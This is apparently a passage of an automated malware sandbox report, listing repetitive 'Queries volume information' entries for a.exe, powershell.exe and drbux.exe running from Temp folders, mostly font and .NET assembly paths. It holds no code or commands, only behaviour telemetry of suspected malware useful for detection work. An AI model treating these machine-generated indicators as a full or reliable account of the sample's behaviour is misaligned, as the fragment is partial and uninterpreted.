Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
